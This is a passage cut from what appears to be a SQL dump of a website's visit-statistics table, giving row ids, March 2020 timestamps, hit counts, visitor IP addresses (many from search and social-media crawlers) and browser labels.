1,1,0,0,'91.196.178.175','chrome'),(489040,1584341589,14,14,0,0,'185.230.242.3','other'),(489041,1584341823,1,1,0,0,'141.8.142.2','other'),(489042,1584342268,1,1,0,0,'8.29.198.26','other'),(489043,1584342750,1,1,0,0,'66.249.70.38','chrome'),(489044,1584342855,1,1,0,0,'8.29.198.25','other'),(489045,1584343150,1,1,0,0,'66.249.64.23','chrome'),(489046,1584343222,1,1,0,0,'91.196.178.190','chrome'),(489047,1584343425,1,1,0,0,'207.46.13.88','other'),(489048,1584346371,1,0,1,0,'66.249.64.23',''),(489049,1584346517,1,1,0,0,'31.13.127.9','other'),(489050,1584347478,2,2,0,0,'207.46.13.88','other'),(489051,1584347654,1,1,0,0,'66.249.64.23','chrome'),(489052,1584348315,1,1,0,0,'66.249.70.38','chrome'),(489053,1584348326,1,1,0,0,'178.154.171.134','other'),(489054,1584348744,1,1,0,0,'207.46.13.88','other'),(489055,1584349358,1,1,0,0,'176.115.96.160','chrome'),(489056,1584349637,1,1,0,0,'91.196.178.76','chrome'),(489057,1584349843,1,1,0,0,'141.8.142.2','other'),(489058,1584350269,2,2,0,0,'176.115.96.160','chrome'),(489059,1584350272,1,1,0,0,'66.249.64.24','chrome'),(489060,1584350615,1,1,0,0,'141.8.183.33','other'),(489061,1584350633,1,1,0,0,'91.196.178.178','chrome'),(489062,1584351543,1,1,0,0,'66.249.64.25','chrome'),(489063,1584351721,1,1,0,0,'66.249.64.24','chrome'),(489064,1584352046,1,1,0,0,'31.13.127.1','other'),(489065,1584352154,2,2,0,0,'176.115.96.160','chrome'),(489066,1584352561,1,1,0,0,'18.217.168.144','chrome'),(489067,1584353083,2,2,0,0,'91.196.178.76','chrome'),(489068,1584353129,1,1,0,0,'8.29.198.26','other'),(489069,1584353695,1,1,0,0,'8.29.198.25','other'),(489070,1584354163,6,6,0,0,'178.154.171.134','other'),(489071,1584354236,1,1,0,0,'141.8.142.2','other'),(489072,1584354508,1,1,0,0,'91.196.178.178','chrome'),(489073,1584354887,1,1,0,0,'178.251.106.149','chrome'),(489074,1584354891,1,0,1,0,'66.249.64.24',''),(489075,1584355291,1,1,0,0,'91.196.178.76','chrome'),(489076,1584355551,1,1,0,0,'66.249.64.23','chrome'),(489077,1584355589,1,1,0,0,'66.249.64.24','chrome'),(489078,1584355724,1,1,0,0,'51.68.152.26','chrome'),(489079,1584355986,1,1,0,0,'91.196.178.148','chrome'),(489080,1584356185,2,2,0,0,'178.154.171.134','other'),(489081,1584356692,1,1,0,0,'141.8.183.53','other'),(489082,1584356783,2,2,0,0,'91.237.107.58','chrome'),(489083,1584357003,1,1,0,0,'207.46.13.88','other'),(489084,1584357041,1,1,0,0,'141.8.142.161','other'),(489085,1584357044,1,1,0,0,'87.250.224.90','other'),(489086,1584357309,2,2,0,0,'91.196.177.46','chrome'),(489087,1584357328,1,1,0,0,'66.249.64.23','chrome'),(489088,1584357396,1,1,0,0,'141.8.142.119','other'),(489089,1584357578,1,1,0,0,'195.95.232.162','chrome'),(489090,1584357838,2,2,0,0,'178.154.171.134','other'),(489091,1584358535,2,1,1,0,'66.249.64.25',''),(489092,1584358589,2,2,0,0,'207.46.13.88','other'),(489093,1584359208,1,1,0,0,'213.180.203.186','other'),(489094,1584359937,1,1,0,0,'109.74.154.72','chrome'),(489095,1584360141,1,1,0,0,'173.252.127.15','other'),(489096,1584360226,1,1,0,0,'66.249.64.25','chrome'),(489097,1584361141,1,1,0,0,'207.46.13.88','other'),(489098,1584361903,1,1,0,0,'66.249.64.24','chrome'),(489099,1584362117,1,1,0,0,'66.249.64.25','chrome'),(489100,1584362742,1,1,0,0,'91.196.178.69','chrome'),(489101,1584362827,1,1,0,0,'46.211.42.104','chrome'),(489102,1584363163,1,1,0,0,'91.196.178.140','firefox'),(489103,1584363251,3,3,0,0,'207.46.13.88','other'),(489104,1584363318,1,1,0,0,'91.196.178.85','firefox'),(489105,1584363519,1,1,0,0,'213.180.203.186','other'),(489106,1584363802,1,0,1,0,'157.55.39.46',''),(489107,1584363871,1,1,0,0,'46.211.42.104','chrome'),(489108,1584363906,1,1,0,0,'91.196.177.46','chrome'),(489109,1584363970,1,0,1,0,'66.249.64.25',''),(489110,1584363983,1,1,0,0,'8.29.198.25','other'),(489111,1584364379,1,1,0,0,'66.249.64.23','chrome'),(489112,1584364574,1,1,0,0,'8.29.198.27','other'),(489113,1584364798,1,1,0,0,'157.55.39.46','other'),(489114,1584365231,1,1,0,0,'178.154.171.127','other'),(489115,1584365428,1,1,0,0,'46.211.42.104','chrome'),(489116,1584365624,1,1,0,0,'66.249.64.23','chrome'),(489117,1584365631,1,1,0,0,'213.180.203.218','other'),(489118,1584365928,1,1,0,0,'66.249.64.25','chrome'),(489119,1584366022,2,2,0,0,'91.196.178.76','chrome'),(489120,1584366040,1,1,0,0,'37.73.28.244','other'),(489121,1584366053,2,2,0,0,'31.13.127.23','other'),(489122,1584366054,2,2,0,0,'31.13.127.17','other'),(489124,1584366055,1,1,0,0,'31.13.127.7','other'),(489125,1584366073,1,1,0,0,'31.13.127.16','other'),(489126,1584366102,1,1,0,0,'31.13.127.8','other'),(489127,1584366107,1,1,0,0,'31.13.127.11','other'),(489128,1584366108,2,2,0,0,'31.13.127.20','other'),(489132,1584366109,1,1,0,0,'31.13.127.15','other'),(489136,1584366111,1,1,0,0,'46.211.64.204','chrome'),(489137,1584366152,1,1,0,0,'94.153.29.246','chrome'),(489138,1584366261,1,1,0,0,'66.249.64.24','chrome'),(489139,1584366413,1,1,0,0,'92.112.124.82','chrome'),(489140,1584366559,1,1,0,0,'31.13.103.6','other'),(489141,1584367046,1,1,0,0,'157.55.39.46','other'),(489142,1584367144,1,0,1,0,'207.46.13.88',''),(489143,1584367241,1,1,0,0,'91.196.177.46','chrome'),(489144,1584367372,1,1,0,0,'66.249.64.25','chrome'),(489145,1584367695,2,2,0,0,'66.249.64.23','chrome'),(489146,1584368191,1,1,0,0,'178.154.171.134','other'),(489147,1584368924,1,1,0,0,'91.196.177.46','chrome'),(489148,1584369284,1,1,0,0,'91.196.178.76','chrome'),(489149,1584369353,1,1,0,0,'31.13.127.8','other'),(489150,1584369355,1,1,0,0,'31.13.127.2','other'),(489151,1584369365,3,3,0,0,'178.154.171.134','other'),(489152,1584369448,1,1,0,0,'107.172.193.194','chrome'),(489153,1584369473,1,1,0,0,'37.73.74.161','chrome'),(489154,1584369625,2,2,0,0,'207.46.13.88','other'),(489155,1584370204,1,1,0,0,'178.154.171.127','other'),(489156,1584370242,1,1,0,0,'157.55.39.46','other'),(489157,1584370273,1,1,0,0,'46.133.67.57','chrome'),(489158,1584370403,1,1,0,0,'31.13.103.32','other'),(489159,1584370405,1,1,0,0,'31.13.127.5','other'),(489160,1584370947,1,1,0,0,'94.153.75.61','chrome'),(489161,1584370954,1,1,0,0,'66.249.64.25','chrome'),(489162,1584371293,1,1,0,0,'173.252.127.37','other'),(489163,1584371486,1,1,0,0,'95.132.217.78','chrome'),(489164,1584372026,1,1,0,0,'128.124.148.193','chrome'),(489165,1584372811,1,1,0,0,'157.55.39.127','other'),(489166,1584372870,1,1,0,0,'91.196.178.124','chrome'),(489167,1584372969,1,1,0,0,'66.249.70.38','chrome'),(489168,1584373006,1,1,0,0,'66.249.70.33','chrome'),(489169,1584373095,1,0,1,0,'66.249.64.23',''),(489170,1584373268,1,1,0,0,'31.13.127.10','other'),(489171,1584373617,1,1,0,0,'66.249.64.25','chrome'),(489172,1584374031,1,1,0,0,'157.55.39.46','other'),(489173,1584374131,1,1,0,0,'91.214.209.148','chrome'),(489174,1584374642,1,1,0,0,'66.249.64.25','chrome'),(489175,1584374873,1,1,0,0,'8.29.198.27','other'),(489176,1584375440,1,1,0,0,'8.29.198.26','other'),(489177,1584375495,1,0,1,0,'157.55.39.127',''),(489178,1584375553,1,1,0,0,'66.249.64.24','chrome'),(489179,1584376313,1,1,0,0,'31.13.127.15','other'),(489180,1584377144,1,1,0,0,'66.249.64.25','chrome'),(489181,1584377275,1,1,0,0,'31.13.127.24','other'),(489182,1584377854,1,1,0,0,'66.249.64.23','chrome'),(489183,1584377959,1,1,0,0,'157.55.39.127','other'),(489184,1584379049,1,1,0,0,'5.102.58.41','chrome'),(489185,1584379390,1,1,0,0,'157.55.39.46','other'),(489186,1584379584,1,1,0,0,'66.249.70.36','chrome'),(489187,1584379593,2,2,0,0,'66.249.64.23','chrome'),(489188,1584379982,1,1,0,0,'157.55.39.127','other'),(489189,1584380771,2,2,0,0,'66.249.64.24','chrome'),(489190,1584381256,1,1,0,0,'46.211.32.195','chrome'),(489191,1584382553,1,1,0,0,'66.249.64.24','chrome'),(489192,1584383718,1,1,0,0,'66.249.64.23','chrome'),(489193,1584384081,1,1,0,0,'46.211.32.195','chrome'),(489194,1584384193,1,1,0,0,'66.249.70.38','chrome'),(489195,1584384269,1,1,0,0,'157.55.39.46','other'),(489196,1584385256,1,1,0,0,'66.249.64.24','chrome'),(489197,1584385729,2,2,0,0,'8.29.198.25','other'),(489198,1584386359,1,1,0,0,'66.249.64.23','chrome'),(489199,1584387680,1,1,0,0,'66.249.64.24','chrome'),(489200,1584388140,1,1,0,0,'31.41.68.61','chrome'),(489201,1584388549,1,1,0,0,'157.55.39.127','other'),(489202,1584388725,1,1,0,0,'66.249.64.23','chrome'),(489203,1584388875,2,2,0,0,'66.249.64.25','chrome'),(489204,1584388906,1,1,0,0,'66.249.64.24','chrome'),(489205,1584389072,1,1,0,0,'173.252.111.16','other'),(489206,1584389074,1,1,0,0,'173.252.87.28','other'),(489207,1584390595,2,2,0,0,'95.213.141.126','opera'),(489208,1584390758,1,1,0,0,'157.55.39.127','other'),(489209,1584391262,1,1,0,0,'66.249.64.23','chrome'),(489210,1584391627,1,1,0,0,'66.249.64.24','chrome'),(489211,1584392463,1,1,0,0,'157.55.39.127','other'),(489212,1584393216,1,1,0,0,'17.58.101.25','other'),(489213,1584393926,1,1,0,0,'66.249.64.23','chrome'),(489214,1584394032,2,2,0,0,'157.55.39.127','other'),(489215,1584396539,1,1,0,0,'66.249.64.25','chrome'),(489216,1584396622,1,1,0,0,'8.29.198.27','other'),(489217,1584396912,2,2,0,0,'157.55.39.127','other'),(489218,1584397154,1,1,0,0,'8.29.198.26','other'),(489219,1584397221,1,1,0,0,'178.159.37.88','chrome'),(489220,1584398037,1,1,0,0,'92.204.50.32','other'),(489221,1584398403,1,1,0,0,'66.249.64.23','chrome'),(489222,1584398782,1,1,0,0,'66.249.64.25','chrome'),(489223,1584399511,1,1,0,0,'178.154.171.134','other'),(489224,1584400502,1,1,0,0,'66.249.64.25','chrome'),(489225,1584401569,1,1,0,0,'66.249.70.36','chrome'),(489226,1584401904,1,1,0,0,'92.63.111.27','other'),(489227,1584403697,2,1,1,0,'157.55.39.127',''),(489228,1584404333,1,1,0,0,'157.55.39.127','other'),(489229,1584405501,1,1,0,0,'66.249.64.23','chrome'),(489230,1584406513,1,1,0,0,'62.205.134.182','other'),(489231,1584407496,1,1,0,0,'8.29.198.26','other'),(489232,1584408027,1,1,0,0,'8.29.198.27','other'),(489233,1584409939,1,1,0,0,'66.249.64.25','chrome'),(489234,1584410361,1,1,0,0,'17.58.101.25','other'),(489235,1584410988,1,1,0,0,'141.8.142.164','other'),(489236,1584411555,1,1,0,0,'66.249.64.23','chrome'),(489237,1584411728,1,1,0,0,'141.8.132.37','other'),(489238,1584411899,1,1,0,0,'37.9.113.177','other'),(489239,1584412581,1,1,0,0,'66.249.64.23','chrome'),(489240,1584414326,1,1,0,0,'94.153.4.55','chrome'),(489241,1584414362,2,1,1,0,'157.55.39.127',''),(489242,1584414681,1,1,0,0,'66.249.64.25','chrome'),(489243,1584415104,1,1,0,0,'31.13.115.21','other'),(489244,1584415106,1,1,0,0,'31.13.115.24','other'),(489245,1584416059,3,3,0,0,'178.154.171.134','other'),(489246,1584416230,1,1,0,0,'66.249.64.25','chrome'),(489247,1584416296,1,1,0,0,'66.249.64.24','chrome'),(489248,1584417384,1,1,0,0,'31.13.115.9','other'),(489249,1584417777,1,1,0,0,'157.55.39.127','other'),(489250,1584418273,1,1,0,0,'66.249.64.25','chrome'),(489251,1584418380,1,1,0,0,'8.29.198.27','other'),(489252,1584418879,1,1,0,0,'178.154.171.134','other'),(489253,1584418899,1,1,0,0,'8.29.198.25','other'),(489254,1584418950,1,1,0,0,'157.55.39.127','other'),(489255,1584420012,1,1,0,0,'207.46.13.104','other'),(489256,1584420677,1,1,0,0,'66.249.70.36','chrome'),(489257,1584420930,2,2,0,0,'207.46.13.104','other'),(489258,1584421146,1,1,0,0,'141.8.142.161','other'),(489259,1584422804,1,1,0,0,'178.154.171.127','other'),(489260,1584423037,2,2,0,0,'207.46.13.104','other'),(489261,1584423082,1,1,0,0,'66.249.64.25','chrome'),(489262,1584423095,1,1,0,0,'107.178.194.227','chrome'),(489263,1584423376,1,1,0,0,'66.249.64.24','chrome'),(489264,1584423452,1,1,0,0,'66.249.64.23','chrome'),(489265,1584423645,1,1,0,0,'62.205.134.182','other'),(489266,1584423823,1,1,0,0,'66.249.70.38','chrome'),(489267,1584424042,1,1,0,0,'66.249.70.36','chrome'),(489268,1584424402,5,5,0,0,'66.249.64.25','chrome'),(489269,1584425560,1,1,0,0,'207.46.13.104','other'),(489270,1584425670,2,2,0,0,'178.154.171.134','other'),(489271,1584426351,1,1,0,0,'66.249.70.33','chrome'),(489272,1584426555,1,1,0,0,'92.113.127.13','firefox'),(489273,1584426892,1,1,0,0,'66.249.64.23','chrome'),(489274,1584427632,1,1,0,0,'194.213.120.9','chrome'),(489275,1584427755,2,2,0,0,'178.154.171.127','other'),(489276,1584428367,1,1,0,0,'178.154.171.134','other'),(489277,1584428499,1,1,0,0,'66.249.64.23','chrome'),(489278,1584428517,1,1,0,0,'66.249.70.33','chrome'),(489279,1584429238,1,1,0,0,'8.29.198.27','other'),(489280,1584429749,1,1,0,0,'8.29.198.25','other'),(489281,1584429799,1,1,0,0,'157.55.39.127','other'),(489282,1584429803,1,1,0,0,'207.46.13.104','other'),(489283,1584430057,2,2,0,0,'66.249.64.25','chrome'),(489284,1584430123,2,2,0,0,'66.249.64.24','chrome'),(489285,1584430142,2,2,0,0,'66.249.64.23','chrome'),(489286,1584431229,1,1,0,0,'157.55.39.127','other'),(489287,1584431234,1,1,0,0,'66.249.64.25','chrome'),(489288,1584432420,3,3,0,0,'46.211.59.234','chrome'),(489289,1584432704,1,1,0,0,'157.55.39.127','other'),(489290,1584432708,3,3,0,0,'66.249.64.25','chrome'),(489291,1584432935,1,1,0,0,'91.196.178.93','chrome'),(489292,1584433110,1,1,0,0,'91.196.178.168','other'),(489293,1584433221,1,1,0,0,'178.154.171.134','other'),(489294,1584433383,1,1,0,0,'66.249.64.24','chrome'),(489295,1584433772,1,1,0,0,'66.249.64.23','chrome'),(489296,1584433872,1,1,0,0,'46.211.50.144','chrome'),(489297,1584434124,1,1,0,0,'66.249.70.33','chrome'),(489298,1584435112,1,1,0,0,'178.154.171.134','other'),(489299,1584436439,1,1,0,0,'94.179.233.173','chrome'),(489300,1584436698,1,1,0,0,'207.46.13.104','other'),(489301,1584437203,1,1,0,0,'66.249.64.23','chrome'),(489302,1584437205,1,1,0,0,'66.249.64.25','chrome'),(489303,1584437688,1,1,0,0,'18.222.181.166','chrome'),(489304,1584437726,1,1,0,0,'66.249.70.38','chrome'),(489305,1584438019,1,1,0,0,'91.196.178.168','other'),(489306,1584438185,1,1,0,0,'91.196.178.190','chrome'),(489307,1584438328,2,1,1,0,'157.55.39.127',''),(489308,1584438394,2,2,0,0,'207.46.13.104','other'),(489309,1584438411,1,1,0,0,'178.154.171.134','other'),(489310,1584438674,1,1,0,0,'91.196.178.88','chrome'),(489311,1584439425,1,1,0,0,'141.8.183.100','other'),(489312,1584439564,1,1,0,0,'207.46.13.104','other'),(489313,1584439636,1,1,0,0,'66.249.64.23','chrome'),(489314,1584440090,2,2,0,0,'8.29.198.25','other'),(489315,1584440656,2,2,0,0,'178.154.171.134','other'),(489316,1584441128,1,1,0,0,'66.249.70.33','chrome'),(489317,1584441154,1,1,0,0,'176.105.192.121','chrome'),(489318,1584441434,1,1,0,0,'157.55.39.127','other'),(489319,1584441743,1,1,0,0,'178.154.171.134','other'),(489320,1584442836,2,2,0,0,'207.46.13.104','other'),(489321,1584443023,2,2,0,0,'157.55.39.127','other'),(489322,1584443123,1,1,0,0,'66.249.64.25','chrome'),(489323,1584443295,1,1,0,0,'66.249.64.24','chrome'),(489324,1584444263,1,1,0,0,'178.154.171.134','other'),(489325,1584444267,1,1,0,0,'178.154.171.127','other'),(489326,1584444319,1,1,0,0,'66.249.64.25','chrome'),(489327,1584444378,1,1,0,0,'207.46.13.104','other'),(489328,1584444610,1,1,0,0,'157.55.39.127','other'),(489329,1584445128,1,1,0,0,'66.249.70.33','chrome'),(489330,1584445240,1,1,0,0,'141.8.183.73','other'),(489331,1584446001,1,0,1,0,'66.249.64.23',''),(489332,1584446060,1,1,0,0,'213.179.254.3','chrome'),(489333,1584446373,1,1,0,0,'109.74.154.72','chrome'),(489334,1584448039,1,1,0,0,'178.154.171.134','other'),(489335,1584448041,1,1,0,0,'91.196.178.169','other'),(489336,1584448603,1,1,0,0,'62.210.80.93','firefox'),(489337,1584448845,1,1,0,0,'66.249.70.36','chrome'),(489338,1584449327,2,2,0,0,'207.46.13.104','other'),(489339,1584449366,1,1,0,0,'91.196.178.93','firefox'),(489340,1584449897,1,1,0,0,'66.249.70.38','chrome'),(489341,1584450170,1,1,0,0,'54.208.102.37','other'),(489342,1584450172,1,1,0,0,'107.21.1.8','other'),(489343,1584450182,1,1,0,0,'178.154.171.134','other'),(489344,1584450459,2,2,0,0,'91.207.245.170','chrome'),(489345,1584450893,1,1,0,0,'91.196.177.46','chrome'),(489346,1584450964,1,1,0,0,'8.29.198.25','other'),(489347,1584451492,1,1,0,0,'8.29.198.27','other'),(489348,1584451870,1,1,0,0,'157.55.39.127','other'),(489349,1584452455,1,1,0,0,'91.196.177.46','chrome'),(489350,1584452670,1,1,0,0,'207.46.13.104','other'),(489351,1584452883,1,1,0,0,'91.196.177.215','chrome'),(489352,1584453070,1,1,0,0,'46.211.52.66','chrome'),(489353,1584453785,1,1,0,0,'31.13.103.18','other'),(489354,1584453867,1,1,0,0,'31.13.103.10','other'),(489355,1584454258,1,0,1,0,'66.249.64.23',''),(489356,1584454701,2,2,0,0,'207.46.13.104','other'),(489357,1584454722,1,1,0,0,'94.153.73.94','chrome'),(489358,1584454736,1,1,0,0,'66.249.64.24','chrome'),(489359,1584455173,1,1,0,0,'207.46.13.211','other'),(489360,1584455680,1,1,0,0,'207.46.13.194','other'),(489361,1584455853,2,2,0,0,'207.46.13.104','other'),(489362,1584456425,1,1,0,0,'157.55.39.239','other'),(489363,1584457073,1,1,0,0,'195.114.148.139','chrome'),(489364,1584457450,1,1,0,0,'17.58.101.25','other'),(489365,1584457557,1,0,1,0,'207.46.13.194',''),(489366,1584457718,2,2,0,0,'178.154.171.127','other'),(489367,1584457763,1,1,0,0,'141.8.142.2','other'),(489368,1584459564,2,2,0,0,'66.249.64.24','chrome'),(489369,1584459691,1,1,0,0,'213.227.140.20','chrome'),(489370,1584460105,1,1,0,0,'141.8.142.2','other'),(489371,1584460572,1,1,0,0,'59.99.193.169','chrome'),(489372,1584460697,2,2,0,0,'207.46.13.104','other'),(489373,1584460943,2,2,0,0,'157.55.39.239','other'),(489374,1584461182,1,1,0,0,'141.8.142.2','other'),(489375,1584461849,1,1,0,0,'8.29.198.26','other'),(489376,1584462394,1,1,0,0,'8.29.198.27','other'),(489377,1584462950,1,1,0,0,'178.154.171.127','other'),(489378,1584463453,1,1,0,0,'207.46.13.104','other'),(489379,1584463848,2,2,0,0,'178.154.171.134','other'),(489380,1584464141,1,1,0,0,'31.13.127.2','other'),(489381,1584464143,1,1,0,0,'31.13.127.1','other'),(489382,1584464904,1,1,0,0,'207.46.13.194','other'),(489383,1584465329,2,2,0,0,'157.55.39.239','other'),(489384,1584466064,1,1,0,0,'66.249.64.25','chrome'),(489385,1584466096,1,1,0,0,'66.249.64.24','chrome'),(489386,1584466642,1,0,1,0,'207.46.13.194',''),(489387,1584466917,1,1,0,0,'207.46.13.104','other'),(489388,1584468179,1,0,1,0,'207.46.13.104',''),(489389,1584468543,2,2,0,0,'207.46.13.194','other'),(489390,1584468547,1,1,0,0,'91.196.178.92','chrome'),(489391,1584469497,3,3,0,0,'178.154.171.134','other'),(489392,1584469515,2,2,0,0,'207.46.13.104','other'),(489393,1584470498,1,1,0,0,'188.163.104.113','chrome'),(489394,1584470625,2,2,0,0,'157.55.39.239','other'),(489395,1584470976,1,1,0,0,'141.8.142.161','other'),(489396,1584471221,2,2,0,0,'31.13.103.5','other'),(489397,1584471228,1,1,0,0,'31.13.103.2','other'),(489398,1584471229,1,1,0,0,'31.13.103.2','other'),(489399,1584471230,1,1,0,0,'91.196.178.177','other'),(489400,1584471947,1,1,0,0,'157.55.39.239','other'),(489401,1584471984,1,1,0,0,'66.249.64.25','chrome'),(489402,1584472640,1,1,0,0,'207.46.13.104','other'),(489403,1584472732,1,1,0,0,'8.29.198.26','other'),(489404,1584472866,1,1,0,0,'157.55.39.239','other'),(489405,1584473270,1,1,0,0,'8.29.198.25','other'),(489406,1584473390,6,6,0,0,'178.154.171.134','other'),(489407,1584473428,1,0,1,0,'66.249.64.24',''),(489408,1584474195,1,1,0,0,'207.46.13.104','other'),(489409,1584474373,1,1,0,0,'66.249.70.33','chrome'),(489410,1584474679,1,1,0,0,'178.154.171.134','other'),(489411,1584474960,1,1,0,0,'157.55.39.239','other'),(489412,1584475142,1,1,0,0,'178.154.171.127','other'),(489413,1584475287,2,2,0,0,'207.46.13.104','other'),(489414,1584475436,1,1,0,0,'66.249.70.33','chrome'),(489415,1584476180,1,1,0,0,'157.55.39.239','other'),(489416,1584476331,1,1,0,0,'66.249.70.38','chrome'),(489417,1584476384,1,1,0,0,'117.148.66.7','chrome'),(489418,1584476389,1,1,0,0,'112.113.154.69','chrome'),(489419,1584476420,1,1,0,0,'66.249.70.36','chrome'),(489420,1584476620,1,1,0,0,'207.46.13.104','other'),(489421,1584477157,1,1,0,0,'193.34.172.66','other'),(489422,1584477454,2,2,0,0,'178.154.171.134','other'),(489423,1584477827,1,1,0,0,'207.46.13.104','other'),(489424,1584478679,1,1,0,0,'178.154.171.134','other'),(489425,1584479398,2,2,0,0,'207.46.13.104','other'),(489426,1584479490,1,1,0,0,'66.249.64.24','chrome'),(489427,1584480051,2,2,0,0,'157.55.39.239','other'),(489428,1584480478,1,1,0,0,'178.154.171.134','other'),(489429,1584481791,1,1,0,0,'141.8.183.53','other'),(489430,1584482619,1,1,0,0,'207.46.13.104','other'),(489431,1584483324,1,1,0,0,'157.55.39.239','other'),(489432,1584483601,1,1,0,0,'8.29.198.25','other'),(489433,1584483690,1,1,0,0,'46.219.230.14','chrome'),(489434,1584483935,1,1,0,0,'178.154.171.134','other'),(489435,1584484157,1,1,0,0,'8.29.198.26','other'),(489436,1584484381,2,2,0,0,'207.46.13.104','other'),(489437,1584484404,1,1,0,0,'66.249.64.23','chrome'),(489438,1584485739,1,1,0,0,'157.55.39.239','other'),(489439,1584485761,1,1,0,0,'207.46.13.104','other'),(489440,1584487207,2,2,0,0,'66.249.64.24','chrome'),(489441,1584487520,1,1,0,0,'207.46.13.104','other'),(489442,1584490211,1,1,0,0,'66.249.64.24','chrome'),(489443,1584490387,2,2,0,0,'93.119.227.19','chrome'),(489444,1584490409,1,1,0,0,'91.209.11.236','other'),(489445,1584490563,1,1,0,0,'207.46.13.104','other'),(489446,1584490663,1,1,0,0,'157.55.39.239','other'),(489447,1584491827,1,1,0,0,'66.249.64.24','chrome'),(489448,1584492024,1,1,0,0,'66.249.64.25','chrome'),(489449,1584492262,2,2,0,0,'178.154.171.134','other'),(489450,1584492913,1,1,0,0,'62.205.134.182','other'),(489451,1584493277,1,1,0,0,'66.249.64.25','chrome'),(489452,1584493581,1,1,0,0,'207.46.13.104','other'),(489453,1584494473,2,2,0,0,'8.29.198.25','other'),(489454,1584495150,1,1,0,0,'141.8.183.73','other'),(489455,1584495456,1,1,0,0,'66.249.64.25','chrome'),(489456,1584496338,1,1,0,0,'131.220.6.152','chrome'),(489457,1584496661,1,1,0,0,'66.249.64.24','chrome'),(489458,1584496919,1,1,0,0,'178.154.171.134','other'),(489459,1584497170,1,0,1,0,'66.249.64.25',''),(489460,1584497860,2,1,1,0,'207.46.13.104',''),(489461,1584498733,1,1,0,0,'66.249.64.23','chrome'),(489462,1584498737,1,0,1,0,'66.249.64.24',''),(489463,1584499202,1,1,0,0,'66.249.64.25','chrome'),(489464,1584501419,2,2,0,0,'178.154.171.134','other'),(489465,1584502291,1,1,0,0,'207.46.13.104','other'),(489466,1584502794,1,1,0,0,'178.154.171.134','other'),(489467,1584503938,2,2,0,0,'178.154.171.134','other'),(489468,1584504056,1,1,0,0,'157.55.39.239','other'),(489469,1584504786,1,0,1,0,'207.46.13.104',''),(489470,1584505344,1,1,0,0,'8.29.198.25','other'),(489471,1584505443,3,3,0,0,'178.154.171.134','other'),(489472,1584505776,1,1,0,0,'66.249.70.36','chrome'),(489473,1584505932,1,1,0,0,'8.29.198.27','other'),(489474,1584506269,3,3,0,0,'178.154.171.127','other'),(489475,1584507044,1,1,0,0,'178.154.171.134','other'),(489476,1584507371,2,2,0,0,'91.196.178.28','chrome'),(489477,1584507646,1,1,0,0,'66.249.64.23','chrome'),(489478,1584507760,1,0,1,0,'66.249.64.24',''),(489479,1584509282,1,1,0,0,'94.179.233.173','chrome'),(489480,1584509426,1,1,0,0,'207.46.13.104','other'),(489481,1584510038,1,1,0,0,'185.189.115.108','chrome'),(489482,1584510129,1,1,0,0,'62.205.134.182','other'),(489483,1584510181,1,1,0,0,'178.154.171.134','other'),(489484,1584511339,1,1,0,0,'31.13.103.4','other'),(489485,1584511340,1,1,0,0,'31.13.103.9','other'),(489486,1584511418,1,1,0,0,'178.154.171.134','other'),(489487,1584513438,3,3,0,0,'157.55.39.239','other'),(489488,1584514434,1,1,0,0,'92.113.126.47','chrome'),(489489,1584514444,1,1,0,0,'157.55.39.239','other'),(489490,1584514450,1,1,0,0,'178.154.171.134','other'),(489491,1584515390,2,2,0,0,'173.208.198.162','other'),(489492,1584515570,1,1,0,0,'17.58.101.25','other'),(489493,1584515653,2,2,0,0,'94.153.23.10','chrome'),(489494,1584516061,1,1,0,0,'207.46.13.104','other'),(489495,1584516118,1,1,0,0,'157.55.39.239','other'),(489496,1584516216,1,1,0,0,'8.29.198.26','other'),(489497,1584516755,1,1,0,0,'37.9.113.163','other'),(489498,1584516846,1,1,0,0,'8.29.198.27','other'),(489499,1584517191,2,2,0,0,'178.154.171.134','other'),(489500,1584518008,2,2,0,0,'66.249.64.24','chrome'),(489501,1584518518,1,1,0,0,'46.133.173.162','chrome'),(489502,1584519227,1,1,0,0,'91.196.178.104','chrome'),(489503,1584519290,1,1,0,0,'91.196.178.102','chrome'),(489504,1584519688,1,1,0,0,'157.55.39.239','other'),(489505,1584519723,1,1,0,0,'66.102.9.169','chrome'),(489506,1584520023,1,1,0,0,'94.153.73.19','chrome'),(489507,1584520025,2,2,0,0,'178.154.171.134','other'),(489508,1584521048,1,1,0,0,'91.196.178.183','chrome'),(489509,1584521114,1,1,0,0,'157.55.39.239','other'),(489510,1584521776,1,1,0,0,'178.154.171.127','other'),(489511,1584522395,1,1,0,0,'195.211.173.40','chrome'),(489512,1584523191,1,1,0,0,'207.46.13.104','other'),(489513,1584523379,1,1,0,0,'18.222.29.24','chrome'),(489514,1584523860,2,2,0,0,'157.55.39.239','other'),(489515,1584524206,1,1,0,0,'178.92.170.175','chrome'),(489516,1584524532,1,1,0,0,'91.196.178.19','chrome'),(489517,1584524746,1,1,0,0,'66.249.64.24','chrome'),(489518,1584525188,1,1,0,0,'91.196.178.93','chrome'),(489519,1584525348,1,1,0,0,'91.196.178.89','chrome'),(489520,1584526091,1,1,0,0,'66.249.70.38','chrome'),(489521,1584526299,1,1,0,0,'91.196.178.89','chrome'),(489522,1584526330,1,0,1,0,'207.46.13.104',''),(489523,1584526678,1,1,0,0,'178.154.171.134','other'),(489524,1584527099,1,1,0,0,'8.29.198.27','other'),(489525,1584527147,1,1,0,0,'66.249.64.24','chrome'),(489526,1584527175,1,1,0,0,'195.211.173.40','chrome'),(489527,1584527457,1,1,0,0,'178.154.171.127','other'),(489528,1584527514,1,1,0,0,'91.196.178.175','chrome'),(489529,1584527526,1,1,0,0,'195.10.210.70','chrome'),(489530,1584527751,1,1,0,0,'8.29.198.26','other'),(489531,1584527947,2,2,0,0,'178.154.171.134','other'),(489532,1584529487,2,2,0,0,'95.213.141.126','opera'),(489533,1584530290,1,1,0,0,'66.249.64.25','chrome'),(489534,1584530960,2,2,0,0,'207.46.13.104','other'),(489535,1584531624,1,1,0,0,'157.55.39.239','other'),(489536,1584531725,1,1,0,0,'91.196.177.250','chrome'),(489537,1584531776,1,1,0,0,'66.249.64.25','chrome'),(489538,1584532217,1,1,0,0,'51.77.249.198','firefox'),(489539,1584532586,1,1,0,0,'66.249.64.24','chrome'),(489540,1584532815,1,1,0,0,'91.196.178.146','other'),(489541,1584532819,2,2,0,0,'3.122.23.166','chrome'),(489542,1584532865,1,1,0,0,'157.55.39.239','other'),(489543,1584533146,1,1,0,0,'141.8.142.2','other'),(489544,1584533165,1,1,0,0,'91.196.178.93','chrome'),(489545,1584533306,1,0,1,0,'66.249.64.25',''),(489546,1584533315,1,1,0,0,'66.249.70.36','chrome'),(489547,1584534007,1,1,0,0,'195.138.64.153','chrome'),(489548,1584534126,2,2,0,0,'157.55.39.239','other'),(489549,1584534543